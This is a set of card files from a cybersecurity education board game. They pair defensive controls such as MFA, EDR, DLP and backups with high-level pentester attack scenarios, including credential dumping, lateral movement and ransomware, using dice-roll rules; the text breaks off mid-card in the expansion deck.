Note (v2.2): Tiers are grouped by section below. Card IDs are stable and do not renumber when a card's tier changes, so IDs within a section are not always contiguous.

Countermeasure Vectors

Vectors: plural convention (v2.2): Most defenses list a single vector. A few list two (marked "Vectors:"). A dual-tagged defense counts as a vector match for either listed vector.


BASIC TIER DEFENSES (10 Budget Each)

D-01: Email Authentication Setup

Tier: BASIC (10 Budget) Vector: SOCIAL_ENGINEERING

Deploy SPF (Sender Policy Framework), DKIM (DomainKeys Identified Mail), and DMARC (Domain Message Authentication, Reporting & Conformance) to prevent email spoofing.

Effect: Blocks phishing emails claiming to be from your domain. Requires attackers to find alternative vectors.

Used Against: T-01 (Phishing Campaign)


D-02: User Security Training

Tier: BASIC (10 Budget) Vector: SOCIAL_ENGINEERING

Conduct phishing awareness training for all staff. Teach recognition of suspicious links, sender spoofing, urgency tactics, and credential harvesting attempts.

Effect: Reduces successful phishing rate by 70-80%. Users become your first line of defense.

Used Against: T-01, T-02 (Phishing, Watering Hole)


D-03: Windows Update Patching

Tier: BASIC (10 Budget) Vector: WEB_EXPLOIT

Deploy automated Windows Update management across all systems. Establish patch deployment timelines (critical = 48 hours, high = 2 weeks).

Effect: Closes browser and kernel vulnerabilities. Prevents watering hole and exploit kit attacks.

Used Against: T-02 (Watering Hole), T-05 (Privilege Escalation)


D-04: Network Firewall Rules

Tier: BASIC (10 Budget) Vector: NETWORK

Deploy perimeter firewall rules to block unauthorized outbound protocols. Default-deny for unusual ports and known malware C2 domains.

Effect: Prevents early-stage lateral movement and C2 beaconing. Slows attacker reconnaissance.

Used Against: T-04 (Lateral Movement), T-09 (C2 Beaconing)


D-05: Log Centralization

Tier: BASIC (10 Budget) Vector: MALWARE

Deploy centralized log aggregation (syslog, Splunk, ELK). Forward Windows Event Logs, firewall logs, DNS queries, and proxy logs to central SIEM.

Effect: Makes local log tampering difficult. Provides investigative visibility into attacker activities. Foundation for threat hunting.

Used Against: T-07, T-08 (Persistence attacks)


D-06: Basic Antivirus Deployment

Tier: BASIC (10 Budget) Vector: MALWARE

Deploy signature-based antivirus across all endpoints. Enable automatic definition updates (daily). Configure real-time file and email scanning.

Effect: Catches known malware variants. Does not detect zero-day or polymorphic malware. Useful as part of defense-in-depth.

Used Against: T-05, T-07, T-08 (Malware-based attacks)


D-19: Backup & Disaster Recovery

Tier: BASIC (10 Budget) (v2.2 — retiered from ELITE; 3-2-1 backups are fundamental hygiene) Vector: MALWARE

Implement 3-2-1 backup strategy: 3 copies of data, 2 different storage types, 1 offsite copy. Test restore procedures quarterly.

Effect: Enables rapid recovery from ransomware. Ensures data availability even if primary systems are compromised. Critical for business continuity.

Used Against: T-07, T-08, T-10, T-11, T-12 (Persistence and exfil attacks)


D-23: IR Program & Runbooks

Tier: BASIC (10 Budget) (v2.2 — retiered from ELITE and renamed from "Incident Response Playbooks" to avoid confusion with the Hardening "Create Playbook" action) Vector: NETWORK

Establish an incident response program with detailed runbooks for common scenarios: malware infection, data exfiltration, ransomware, insider threats, supply chain compromise. Include roles, responsibilities, communication plans.

Effect: Enables faster, more coordinated response when incidents occur. Reduces confusion during high-pressure situations. Improves incident containment and recovery time.

Used Against: T-09, T-10, T-11, T-12 (All C2 & Exfil attacks)


ADVANCED TIER DEFENSES (15 Budget Each)

D-07: Multi-Factor Authentication (MFA)

Tier: ADVANCED (15 Budget) Vector: CREDENTIAL_ABUSE

Deploy MFA for all remote access (VPN, RDP), email, and admin portals. Use authenticator apps or hardware tokens (not SMS).

Effect: Makes compromised credentials useless without the second factor. Blocks credential stuffing attacks.

Used Against: T-03 (Compromised Credentials), T-06 (Mimikatz)


D-08: EDR (Endpoint Detection & Response)

Tier: ADVANCED (15 Budget) Vector: MALWARE

Deploy EDR agent on all endpoints. Monitor process execution, file creation, registry modifications, and memory injection attempts. Enable behavioral analytics.

Effect: Detects living-off-the-land attacks (PowerShell, cmd, scheduled tasks). Provides deep visibility into attack progression.

Used Against: T-05 (Priv Esc), T-07, T-08 (Persistence)


D-09: Network Segmentation

Tier: ADVANCED (15 Budget) Vector: NETWORK

Implement VLANs and microsegmentation to separate user workstations from servers. Deploy firewall rules between segments. Implement zero-trust network access controls.

Effect: Prevents lateral movement via SMB and other internal protocols. Limits blast radius of compromise.

Used Against: T-04 (Lateral Movement), T-06 (Credential Dumping spread)


D-10: SIEM Correlation Rules

Tier: ADVANCED (15 Budget) Vector: NETWORK

Create SIEM rules to detect attack patterns: failed login spikes, privilege escalation attempts, unusual process creation, scheduled task creation, and data exfil indicators.

Effect: Correlates events across logs to detect multi-step attacks. Enables faster investigation and response.

Used Against: T-04, T-05, T-06, T-07, T-08, T-09 (Detection across entire chain)


D-11: Data Loss Prevention (DLP)

Tier: ADVANCED (15 Budget) Vector: DATA_EXFIL

Deploy DLP to monitor outbound data transfers. Classify sensitive data (customer PII, source code, trade secrets). Block or alert on unauthorized transfers.

Effect: Prevents SQL database exfiltration and bulk data theft. Detects unusual data access patterns. Enforces data security policies.

Used Against: T-10, T-11, T-12 (Data exfiltration attacks)


D-12: Password Manager & Vault

Tier: ADVANCED (15 Budget) Vector: CREDENTIAL_ABUSE

Deploy enterprise password vault (CyberArk, HashiCorp Vault). Enforce strong unique passwords. Implement password rotation policies for service accounts.

Effect: Prevents credential reuse attacks. Makes credential stuffing difficult. Provides audit trail for compliance and incident investigation.

Used Against: T-03, T-06 (Credential attacks)


D-18: Intrusion Prevention System (IPS)

Tier: ADVANCED (15 Budget) (v2.2 — retiered from ELITE; IPS/WAF appliances are standard mid-tier controls) Vector: WEB_EXPLOIT

Deploy network-based IPS with exploit signatures. Monitor for known CVE exploitation patterns. Configure WAF (Web Application Firewall) rules for SQL injection, XSS, and OWASP Top 10 attacks.

Effect: Blocks exploitation attempts in transit. Prevents watering hole and web exploit attacks. Most effective when combined with patching.

Used Against: T-02 (Watering Hole), T-05 (Exploits)


D-24: Threat Intelligence Integration

Tier: ADVANCED (15 Budget) (v2.2 — retiered from ELITE; community feeds like MISP/OTX are affordable) Vectors: NETWORK, DATA_EXFIL (v2.2 — dual-tagged; counts as a match for either vector)

Subscribe to threat intelligence feeds (MISP, VirusTotal, AlienVault OTX). Integrate IOCs (Indicators of Compromise) into firewall, SIEM, and proxy. Participate in information sharing communities.

Effect: Enables faster detection of known malicious IPs and domains. Identifies emerging threats targeting your industry. Reduces detection time from days to minutes.

Used Against: T-09 (C2 Beaconing), T-10, T-11, T-12 (Exfil detection)


ELITE TIER DEFENSES (25 Budget Each)

D-13: Threat Hunting Program

Tier: ELITE (25 Budget) Vector: MALWARE

Establish proactive threat hunting using MITRE ATT&CK framework. Hunt for living-off-the-land techniques, anomalous processes, suspicious registry changes, and memory injection.

Effect: Finds advanced attacks that bypass signature-based detection. Detects LSASS dumping, scheduled task persistence, and registry backdoors. Reduces dwell time significantly.

Used Against: T-05, T-07, T-08 (Advanced persistence)


D-14: Memory Forensics

Tier: ELITE (25 Budget) Vector: MALWARE

Deploy memory capture and analysis (Volatility, Memoryze). Create memory images of suspicious systems. Analyze for credential dumping, injected code, and rootkits.

Effect: Detects Mimikatz attacks and credential harvesting. Reveals attacker activities hidden from disk forensics. Critical for identifying advanced persistence mechanisms.

Used Against: T-06 (Mimikatz), T-07, T-08 (In-memory attacks)


D-15: Deception Technology (Honeypots)

Tier: ELITE (25 Budget) Vector: NETWORK

Deploy decoy systems (fake file servers, databases, credentials) to detect lateral movement. Create canary tokens that alert when accessed.

Effect: Any access to honeypots indicates active compromise. Detects lateral movement with zero false positives. Slows attacker progress and forces reconnaissance.

Used Against: T-04 (Lateral Movement), T-06 (Credential abuse)


D-16: Credential Guard & Secure Boot

Tier: ELITE (25 Budget) Vector: CREDENTIAL_ABUSE

Enable Windows Credential Guard to isolate LSASS in virtualized container. Implement UEFI Secure Boot to prevent bootkit attacks. Enable TPM attestation.

Effect: Makes Mimikatz credential dumping ineffective. Prevents bootloader manipulation. Ensures firmware integrity. Blocks entire classes of early-boot attacks.

Used Against: T-06 (Mimikatz), T-07, T-08 (Persistence)


D-17: Advanced Malware Sandbox

Tier: ELITE (25 Budget) Vector: MALWARE

Deploy advanced sandboxing solution (Cuckoo, Detonate, hybrid-analysis). Analyze suspicious files/URLs in isolated environments. Generate behavioral indicators and YARA rules.

Effect: Detects zero-day malware and unknown exploits. Analyzes evasion tactics. Generates detection rules for SIEM. Prevents spread of novel malware.

Used Against: T-05 (Privilege Escalation), T-07, T-08 (Malware persistence)


D-20: Zero Trust Access Control

Tier: ELITE (25 Budget) Vector: CREDENTIAL_ABUSE

Implement zero-trust architecture: verify every access request regardless of source. Deploy device identity, user identity, and behavior analytics. Implement conditional access policies.

Effect: Eliminates implicit trust based on network location. Even compromised devices cannot access sensitive resources without proper authentication and behavior validation.

Used Against: T-03, T-06 (Credential abuse), T-04 (Lateral movement)


D-21: Container Security & Orchestration

Tier: ELITE (25 Budget) Vector: MALWARE

Deploy container runtime security (Falco, Sysdig). Implement image scanning for vulnerabilities. Use policy enforcement engines (OPA/Gatekeeper). Implement network policies for container segmentation.

Effect: Detects container escape attempts. Prevents vulnerable images from running. Limits lateral movement within containerized environments. Critical for modern cloud applications.

Used Against: T-05 (Priv Esc), T-04 (Lateral Movement in cloud)


D-22: Security Information & Event Management (SIEM)

Tier: ELITE (25 Budget) Vector: NETWORK

Deploy enterprise SIEM (Splunk, ELK, QRadar). Centralize logs from all sources. Implement automated correlation rules, threat intelligence integration, and incident response workflows.

Effect: Provides centralized visibility into all security events. Enables rapid threat detection and investigation. Foundation for mature incident response program.

Used Against: T-04, T-06, T-07, T-08, T-09, T-10 (Detection across entire attack chain)


Defense Card Summary

Distribution by Tier (v2.2)

Distribution by Vector (v2.2)

Note: 24 cards total. D-24 is dual-tagged (NETWORK + DATA_EXFIL) and appears in both rows, so vector-row counts sum to 25 tags across 24 cards.


How These Cards Are Used in Hardening

Deploy Action

Blue Team selects a Defense Card from their hand and deploys it: - Cost: 10/15/25 Budget depending on tier - Roll Required: None—automatic success - Effect: Defense immediately becomes active and counts toward Security Score - (v2.2) Two BASIC defenses may be deployed together as a single action

Pentester Challenge (v2.2 — one canonical formula)

When a Pentester Tactic is drawn (see Pentester Tactic Cards file), the Blue Team chooses one deployed defense to resolve it with:

Defense roll = d20 + printed defense bonus for the chosen defense (from the tactic card's bonus list) + hardening upgrades on that defense (+2 each) + relevant playbook (+3)

Success if the total is ≥ the tactic card's printed DC.

See Module: Hardening for the full resolution procedure and a worked example.

Strategic Layering

Multiple defenses work together: - BASIC defenses are cheap but carry small printed bonuses against tactics - ADVANCED defenses provide good cost/effectiveness balance - ELITE defenses are expensive but carry the largest printed bonuses against sophisticated tactics - Layering across vectors matters: each tactic card lists which defenses earn bonuses, so broad coverage means you always have a strong defense to choose


Print Instructions

  1. Print on cardstock (250 gsm minimum) for durability
  2. Cut along dotted lines
  3. Optional: Laminate or use sleeves for durability and reusability
  4. Consider color-coding by vector for visual quick reference:
  5. SOCIAL_ENGINEERING: Red
  6. WEB_EXPLOIT: Orange
  7. CREDENTIAL_ABUSE: Blue
  8. MALWARE: Purple
  9. NETWORK: Green
  10. DATA_EXFIL: Cyan

Notes on Card Reusability

These 24 Defense Cards are the same cards used in Incident Response module. The difference in usage:

This allows educators to: - Use one physical deck for both modules - Teach defense-in-depth concepts in sequence - Show how defenses complement each other


Hardening Module: Defense Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition

cards/hardening/core-deck/pentester-tactic-cards.md

Hardening Module: Pentester Tactic Cards

Version: 2.2 - Playtest Edition Last Updated: July 2026


Overview

Pentester Tactic Cards are unique to the Hardening Module. These 8 cards represent real-world red team attack tactics that challenge the defenses the Blue Team has deployed.


Core Concept

During the Hardening module gameplay:

  1. Blue Team Deploys Defenses - Accumulate defensive controls across the 7-turn game (v2.2)
  2. Pentester Challenge Occurs - Red team launches simulated attack
  3. Defense Test - Deployed defenses are tested against the tactic
  4. Resolution - Blue Team rolls d20 + modifiers to see if defense holds
  5. Learning Moment - Whether attack succeeds or fails, discuss why

Pentester Tactic Cards

PT-01: Social Engineering - Pretexting Attack

Tactic Type: Initial Access / Social Engineering Target Vectors: SOCIAL_ENGINEERING, CREDENTIAL_ABUSE Difficulty: BASIC (defeat DC 12)

Description: A pentester calls your IT helpdesk impersonating a VIP executive. They claim to be traveling without their laptop and need emergency access to critical systems. They pressure the helpdesk with urgency and authority. Can they bypass your security procedures?

Attack Details: - Targets: User security training gaps, process enforcement - Success indicates: Social engineering protocols aren't followed - Blue Team rolls 1d20 to resist

Defending Defenses: - D-02 (User Security Training): +2 bonus (staff trained to verify callers) - D-07 (MFA): +1 bonus (second factor still required) - D-23 (IR Program & Runbooks): +2 bonus (clear escalation procedures)

Outcome: - Blue Team Succeeds (12+): Helpdesk follows proper verification procedures, attacker is denied - Blue Team Fails: Attacker gains credentials or system access; Blue Team must deploy additional defenses

Teaching Point: Social engineering exploits human psychology and organizational process gaps. Technology alone cannot defend against this; training and procedures are essential.


PT-02: Malware Evasion - Living-off-the-Land Technique

Tactic Type: Persistence & Execution Target Vectors: MALWARE, CREDENTIAL_ABUSE Difficulty: INTERMEDIATE (defeat DC 13)

Description: A pentester delivers a payload that uses only built-in Windows tools (PowerShell, scheduled tasks, registry modifications, WMI) to maintain persistence and establish a beachhead. No suspicious files, no external C2 traffic—just legitimate Windows features weaponized. Can your defenses detect this?

Attack Details: - Targets: Traditional antivirus, signature-based detection - Success indicates: Blind spot in malware detection strategy - Blue Team rolls 1d20 to detect and block

Defending Defenses: - D-06 (Basic Antivirus): +1 bonus only (signatures don't catch living-off-the-land) - D-08 (EDR): +3 bonus (behavioral detection catches anomalous PowerShell/schtasks) - D-13 (Threat Hunting): +2 bonus (proactive hunting finds MITRE ATT&CK techniques) - D-14 (Memory Forensics): +2 bonus (finds injected code in memory)

Outcome: - Blue Team Succeeds (13+): EDR or threat hunting detects the attack before persistence is established - Blue Team Fails: Attacker establishes persistent access; Blue Team must escalate incident response

Teaching Point: Signature-based defenses are insufficient against sophisticated attackers. Behavioral detection and proactive hunting are essential for modern threats.


PT-03: Credential Dumping - Mimikatz Attack

Tactic Type: Privilege Escalation / Credential Access Target Vectors: CREDENTIAL_ABUSE, MALWARE Difficulty: INTERMEDIATE (defeat DC 13)

Description: A pentester with local admin privileges attempts to dump LSASS memory and extract cached domain credentials using Mimikatz. These credentials could then be used for lateral movement and privilege escalation. Can your endpoint defenses prevent this?

Attack Details: - Targets: LSASS memory protection, credential storage hardening - Success indicates: Weak credential protection on endpoints - Blue Team rolls 1d20 to block the attack

Defending Defenses: - D-07 (MFA): +1 bonus only (doesn't protect cached credentials) - D-12 (Password Vault): +2 bonus (service accounts in vault aren't in LSASS) - D-14 (Memory Forensics): +2 bonus (detects LSASS tampering) - D-16 (Credential Guard & Secure Boot): +4 bonus (isolates LSASS in virtualized container—primary defense) - D-08 (EDR): +2 bonus (alerts on suspicious LSASS access)

Outcome: - Blue Team Succeeds (13+): Credential Guard blocks the attack or EDR detects the attempt - Blue Team Fails: Domain credentials compromised; Blue Team loses future rolls vs. credential-based attacks (-1 penalty for remaining game)

Teaching Point: Privileged credential protection is critical. Credential Guard is the gold standard for endpoint protection. Service account password rotation and vaults prevent cached credential abuse.


PT-04: Lateral Movement - Network Traversal

Tactic Type: Lateral Movement Target Vectors: NETWORK, CREDENTIAL_ABUSE Difficulty: INTERMEDIATE (defeat DC 13)

Description: A pentester with access to one workstation attempts to move laterally across your network using SMB share enumeration, pass-the-hash attacks, and exploitation of unsecured share access. Can your network architecture and controls prevent this?

Attack Details: - Targets: Network segmentation, share access controls - Success indicates: Flat network with unrestricted SMB traffic - Blue Team rolls 1d20 + architecture modifiers

Defending Defenses: - D-04 (Firewall Rules): +1 bonus (blocks some traffic, but not SMB on internal network) - D-09 (Network Segmentation): +3 bonus (restricts SMB traffic between segments) - D-10 (SIEM Correlation): +2 bonus (detects lateral movement patterns) - D-15 (Honeypots): +2 bonus (attacker triggers canary token) - D-20 (Zero Trust Access): +3 bonus (even lateral access requires authentication)

Outcome: - Blue Team Succeeds (13+): Network segmentation or honeypots stop the attack - Blue Team Fails: Attacker establishes foothold on file server or domain controller; future defense deployments cost 1.5x Budget

Teaching Point: Flat networks are indefensible. Network segmentation combined with zero-trust access controls are essential. Honeypots are low-cost but highly effective deterrents.


PT-05: Privilege Escalation - Unpatched Kernel Exploit

Tactic Type: Privilege Escalation Target Vectors: MALWARE, WEB_EXPLOIT Difficulty: ADVANCED (defeat DC 14)

Description: A pentester discovers an unpatched vulnerability in a critical Windows kernel or third-party driver. They develop a local privilege escalation exploit that elevates from user to SYSTEM privileges. Can your patch management and detection systems catch this?

Attack Details: - Targets: Patch management gaps, detection of privilege escalation - Success indicates: Unpatched systems or poor vulnerability management - Blue Team rolls 1d20 to patch or detect

Defending Defenses: - D-03 (Windows Patching): +3 bonus (prevents the vulnerability from existing) - D-05 (Log Centralization): +1 bonus (may detect unusual privilege elevation attempts) - D-08 (EDR): +3 bonus (behavioral detection alerts on privilege escalation) - D-13 (Threat Hunting): +2 bonus (proactive hunting finds unpatched systems)

Outcome: - Blue Team Succeeds (14+): Patch management or EDR prevents or detects the exploit before escalation - Blue Team Fails: Attacker gains system-level access; all subsequent attacks get +1 bonus, all defensive deployments get -1 penalty for remainder of game

Teaching Point: Patch management is one of the highest-ROI security controls. Unpatched systems are low-hanging fruit for attackers. Automated patching and vulnerability scanning are essential.


PT-06: Data Exfiltration - Unmonitored Channel

Tactic Type: Exfiltration Target Vectors: DATA_EXFIL, NETWORK Difficulty: ADVANCED (defeat DC 14)

Description: A pentester with network access attempts to exfiltrate sensitive data (customer database, source code, trade secrets) via an unmonitored channel: DNS tunneling, steganography in image uploads, or a rogue cloud storage account. Can your DLP and monitoring systems catch this?

Attack Details: - Targets: Data loss prevention, network monitoring blind spots - Success indicates: Unsupervised data channels or weak DLP enforcement - Blue Team rolls 1d20 to detect and block

Defending Defenses: - D-04 (Firewall Rules): +1 bonus (may block some exfil channels) - D-05 (Log Centralization): +1 bonus (may reveal unusual network traffic) - D-10 (SIEM Correlation): +2 bonus (detects anomalous data transfer patterns) - D-11 (DLP): +4 bonus (primary defense against data exfil) - D-22 (SIEM): +2 bonus (detects data access and transfer anomalies) - D-24 (Threat Intelligence): +1 bonus (identifies known C2 domains/IPs)

Outcome: - Blue Team Succeeds (14+): DLP or network monitoring detects and blocks the exfil attempt - Blue Team Fails: Data is exfiltrated; Blue Team immediately loses the game (breach is complete)

Teaching Point: DLP and network monitoring are essential for preventing data loss. Organizations must understand their critical data flows and monitor them accordingly.


PT-07: Supply Chain Compromise - Trusted Software Update

Tactic Type: Initial Access / Persistence Target Vectors: MALWARE, WEB_EXPLOIT Difficulty: ADVANCED (defeat DC 14)

Description: A pentester compromises a software vendor that your organization trusts. They inject malicious code into a legitimate update that your organization automatically deploys. The malware is signed with the vendor's legitimate certificate. Can you detect and prevent this?

Attack Details: - Targets: Update management, supply chain security, behavioral detection - Success indicates: Over-trust in vendor updates, poor verification procedures - Blue Team rolls 1d20 to detect or prevent

Defending Defenses: - D-03 (Windows Patching): +0 bonus (legitimate patch—can't be distinguished) - D-06 (Antivirus): +1 bonus only (legitimate signature—won't help) - D-08 (EDR): +3 bonus (behavioral detection catches malicious activity after installation) - D-13 (Threat Hunting): +2 bonus (proactive hunting for suspicious post-update behavior) - D-17 (Malware Sandbox): +2 bonus (detonates update before deployment) - D-21 (Container Security): +2 bonus (prevents compromise spread in containerized environments)

Outcome: - Blue Team Succeeds (14+): EDR or threat hunting detects malicious behavior before widespread compromise - Blue Team Fails: Supply chain compromise spreads across organization; -2 penalty to all defense rolls for remainder of game

Teaching Point: Trust is not security. Even legitimate vendors can be compromised. Behavioral detection, code signing verification, and staged rollouts are essential.


PT-08: Insider Threat - Malicious Administrator

Tactic Type: Privilege Abuse / Data Exfiltration Target Vectors: CREDENTIAL_ABUSE, DATA_EXFIL, NETWORK Difficulty: EXPERT (defeat DC 15)

Description: A pentester acts as a disgruntled administrator with legitimate system access. They use their privileges to bypass security controls, disable logging, create backdoor accounts, and exfiltrate sensitive data. Can your controls prevent insider threats?

Attack Details: - Targets: Administrative account monitoring, privilege abuse detection - Success indicates: Weak monitoring of privileged access, overly broad admin permissions - Blue Team rolls 1d20 to detect and prevent

Defending Defenses: - D-05 (Log Centralization): +2 bonus (immutable offsite logs prevent tampering) - D-07 (MFA): +1 bonus (makes it harder to create backdoor accounts) - D-10 (SIEM Correlation): +2 bonus (detects unusual admin activity patterns) - D-12 (Password Vault): +2 bonus (requires approval/audit for privileged access) - D-20 (Zero Trust Access): +3 bonus (even admins require proper authorization for sensitive access) - D-22 (SIEM): +3 bonus (behavioral analytics detect insider threats) - D-23 (IR Program & Runbooks): +1 bonus (clear escalation for suspicious admin activity)

Outcome: - Blue Team Succeeds (15+): Monitoring detects unauthorized admin activity before damage - Blue Team Fails: Insider exfiltrates data and disables controls; Blue Team loses game immediately and additional penalties apply to Disaster Recovery module (if played next)

Teaching Point: Insider threats are one of the hardest problems in security. Prevention is impossible; detection is essential. Privileged access management, behavioral monitoring, and immutable audit logs are critical.


Pentester Tactic Card Summary

Card Tactic Vectors Difficulty Primary Defense
PT-01 Social Engineering SE, CA BASIC (DC 12) User Training
PT-02 Malware Evasion MALWARE, CA INTERMEDIATE (DC 13) EDR
PT-03 Credential Dumping CA, MALWARE INTERMEDIATE (DC 13) Credential Guard
PT-04 Lateral Movement NETWORK, CA INTERMEDIATE (DC 13) Network Segmentation
PT-05 Privilege Escalation MALWARE, WEB ADVANCED (DC 14) Patch Management
PT-06 Data Exfiltration EXFIL, NETWORK ADVANCED (DC 14) DLP
PT-07 Supply Chain Compromise MALWARE, WEB ADVANCED (DC 14) EDR/Threat Hunting
PT-08 Insider Threat CA, EXFIL, NETWORK EXPERT (DC 15) Privileged Access Monitoring

How Pentester Tactics Are Used in Gameplay

Timing

Pentester Tactics are typically drawn during turns 3-4 of the 7-turn game (v2.2). This gives the Blue Team time to deploy initial defenses but creates time pressure for the final deployment phase.

Resolution (v2.2 — one canonical formula)

When a Pentester Tactic is drawn:

  1. Announce the Attack: Read the tactic description to the Blue Team
  2. Blue Team Chooses ONE Deployed Defense: Pick the defense you resolve this tactic with (it must be deployed)
  3. Roll:

Defense roll = d20 + printed defense bonus for the chosen defense (from this tactic card's bonus list) + hardening upgrades on that defense (+2 each) + relevant playbook (+3)

  1. Compare to DC: If total ≥ the tactic's printed DC, the tactic fails; if < DC, the tactic succeeds
  2. Apply Consequences: Based on success or failure

Notes: - Only ONE defense's printed bonus applies per roll—there is no stacking of multiple defenses on a single roll. Layering still matters: broad coverage means a strong printed bonus is always available to choose. - If the chosen defense is not listed on the tactic card, its printed bonus is +0 (upgrades and playbooks still apply). - Multi-vector or multi-phase tactics (e.g., PT-09 in the expansion): resolve each vector/phase as a separate roll, choosing one defense for each roll.

See Module: Hardening for the full procedure and a worked example.

Difficulty Progression


Design Philosophy

Each Pentester Tactic represents a real-world attack pattern that: 1. Is realistic - Based on actual TTPs (Tactics, Techniques, Procedures) from MITRE ATT&CK 2. Teaches defense priorities - Success requires defense-in-depth, not single solutions 3. Demonstrates gaps - Failing a tactic shows where the defense strategy is weak 4. Encourages layering - Multiple defenses together are stronger than any single defense


Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Use a different color scheme from Defense Cards (suggest:
  3. RED background with black text (indicates "attack" phase)
  4. Compare to BLUE background for Defense Cards (indicates "defense" phase)
  5. Cut along dotted lines
  6. These should be shuffled and kept separate from Defense Cards during gameplay

Expansion Possibilities

For advanced gameplay, 8 additional Pentester Tactics are available: - PT-09: Multi-Vector Attack (combines multiple tactics) - PT-10: Zero-Day Exploitation (signature-based defenses are useless) - PT-11: Ransomware Deployment & Encryption (requires backup verification) - PT-12: APT Campaign (multi-turn tactic with escalating difficulty) - PT-13: Cloud Misconfiguration Attack (for cloud-native environments) - PT-14: IoT/OT Compromise (for industrial environments) - PT-15: Firmware/BIOS Attack (hardware-level persistence) - PT-16: Container Escape (privilege escalation from containers)

See ../expansion-deck/advanced-tactics.md for these advanced cards.


Hardening Module: Pentester Tactic Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition

cards/hardening/expansion-deck/advanced-tactics.md

Hardening Module: Advanced Pentester Tactics (Expansion)

Version: 2.2 - Playtest Edition Last Updated: July 2026

Difficulty → DC mapping (v2.2): BASIC = DC 12, INTERMEDIATE = DC 13, ADVANCED = DC 14, EXPERT = DC 15, EXPERT+ = DC 16. The Outcome threshold on every card equals its printed DC. Resolution uses the canonical formula in Module: Hardening: d20 + printed bonus for ONE chosen defense + upgrades (+2 each) + playbook (+3) vs DC.


Overview

Advanced Pentester Tactic Cards extend the core Hardening module with 8 sophisticated attack scenarios for experienced players and complex threat environments.


Advanced Pentester Tactics

PT-09: Multi-Vector Attack - Coordinated Campaign

Tactic Type: Advanced Persistence / Multi-Stage Target Vectors: MALWARE, CREDENTIAL_ABUSE, NETWORK, DATA_EXFIL Difficulty: ADVANCED (defeat DC 14)

Description: A pentester orchestrates a coordinated multi-vector attack that combines multiple tactics simultaneously: social engineering + malware + lateral movement + data exfiltration. Each phase is dependent on the previous one, and success in one area opens opportunities in others. Can your defenses coordinate to stop the full attack chain?

Attack Details: - Phase 1: Phishing delivers initial malware - Phase 2: Malware establishes persistence - Phase 3: Lateral movement to file server - Phase 4: Credential harvesting and exfiltration - Targets: Defense coordination, integrated threat response - Blue Team must roll separately for EACH phase

Defending Defenses: - Phase 1 (Social Engineering): D-02 (+2), D-23 (+2) reduce success by +2 on this roll - Phase 2 (Malware): D-06 (+1), D-08 (+3), D-13 (+2), D-17 (+2) for this phase - Phase 3 (Lateral Movement): D-04 (+1), D-09 (+3), D-10 (+2), D-15 (+2) for this phase - Phase 4 (Data Exfil): D-11 (+4), D-22 (+2), D-24 (+1) for this phase - Card Effect — Full Coverage: If Blue Team has deployed defenses covering all 4 targeted vectors, add +1 to each phase roll

Resolution (v2.2): Each phase is a separate roll against DC 14, with one chosen defense per roll (that phase's bonus list).

Outcome: - Blue Team Succeeds (14+ on every phase roll): Comprehensive defense stops the attack chain - Blue Team Fails ANY phase: Attack progresses; Blue Team loses 1d4 security score points per failed phase and must deploy emergency response

Teaching Point: Modern attacks are sophisticated and multi-faceted. No single defense can stop them. Comprehensive defense-in-depth with coordinated response is essential. Defense teams must practice responding to coordinated attacks.


PT-10: Zero-Day Exploitation - Unknown Vulnerability

Tactic Type: Initial Access / Execution Target Vectors: MALWARE, WEB_EXPLOIT Difficulty: EXPERT (defeat DC 15)

Description: A pentester exploits a previously unknown vulnerability (zero-day) in a critical business application. Traditional defenses (patching, signature-based detection, vulnerability scanning) cannot help because the vulnerability isn't public. Only behavioral detection or proactive hunting can identify this attack. Can your advanced monitoring catch what signature-based tools cannot?

Attack Details: - Targets: Signature-based defenses, unknown vulnerability management - Attack Vector: Unpatched but pristine application - Success indicates: Blind spots in behavioral detection - Blue Team rolls 1d20 to detect before exploitation succeeds

Defending Defenses: - D-03 (Patching): +0 bonus (zero-day by definition isn't in patches) - D-06 (Antivirus): +0 bonus (signatures don't exist for zero-day) - D-08 (EDR): +3 bonus (behavioral analytics detect anomalous post-exploitation) - D-13 (Threat Hunting): +3 bonus (proactive hunting finds zero-day activity) - D-17 (Sandbox): +2 bonus (detonates malicious payloads in sandbox before deployment) - D-18 (IPS): +1 bonus only (cannot stop unknown exploits) - D-21 (Container Security): +2 bonus (isolates exploited application)

Outcome: - Blue Team Succeeds (15+): EDR or threat hunting detects post-exploitation activity before damage - Blue Team Fails: Zero-day achieves initial access; Blue Team suffers -1 penalty to all rolls for remainder of game (blind spot in defenses)

Special Rule: If Blue Team has NOT deployed at least 2 of {D-08, D-13, D-17}, they cannot succeed at this challenge (add clause: "You must have behavioral detection to stop unknown exploits").

Teaching Point: Signature-based defenses have inherent limitations. Behavioral detection and threat hunting are essential for detecting novel attacks. Zero-day preparedness requires assumption-of-breach mindset.


PT-11: Ransomware Deployment & Encryption

Tactic Type: Impact / Extortion Target Vectors: MALWARE, DATA_EXFIL, NETWORK Difficulty: EXPERT (defeat DC 15)

Description: A pentester deploys ransomware that encrypts critical business data and demands payment for decryption keys. The attack combines malware execution, persistence, and data exfiltration (to threaten public disclosure if ransom not paid). This is the culmination of a successful attack chain. Can your defenses prevent data encryption, and can your backup strategy save you?

Attack Details: - Targets: Data availability, backup resilience, recovery procedures - Success indicates: Lack of backup redundancy or immutable backup protection - Blue Team rolls 1d20 to either: (A) prevent ransomware deployment, OR (B) recover from backup

Defending Defenses: - Option A: Prevent Deployment - D-08 (EDR): +3 bonus (detects ransomware execution) - D-13 (Threat Hunting): +2 bonus (proactive hunting finds ransomware) - D-14 (Memory Forensics): +1 bonus (detects encryption process) - D-17 (Sandbox): +2 bonus (detonates before reaching production) - D-21 (Container Security): +2 bonus (prevents spread in containerized environments)

Outcome: - Blue Team Succeeds (15+ on prevention roll, or 12+ on recovery roll under Option B): Ransomware prevented or successfully recovered from backup - Blue Team Fails: Data encrypted; immediate loss of 25% of remaining Budget, and all data-dependent operations suffer -2 penalty for remainder of game

Special Rule - Immutable Backup Check: If Blue Team deployed D-19, they also need verification that backups are immutable and tested. If backup testing procedures weren't mentioned in D-19 deployment, the bonus only applies if they roll 15+.

Teaching Point: Ransomware is now the #1 cybersecurity threat. Prevention through detection is important, but backup resilience is the ultimate defense. Immutable backups that survive ransomware attacks are essential business continuity strategy. Regular restore testing is critical.


PT-12: APT Campaign - Multi-Turn Persistent Threat

Tactic Type: Advanced Persistent Threat / Long-term Compromise Target Vectors: CREDENTIAL_ABUSE, MALWARE, NETWORK, DATA_EXFIL Difficulty: EXPERT+ (defeat DC 16)

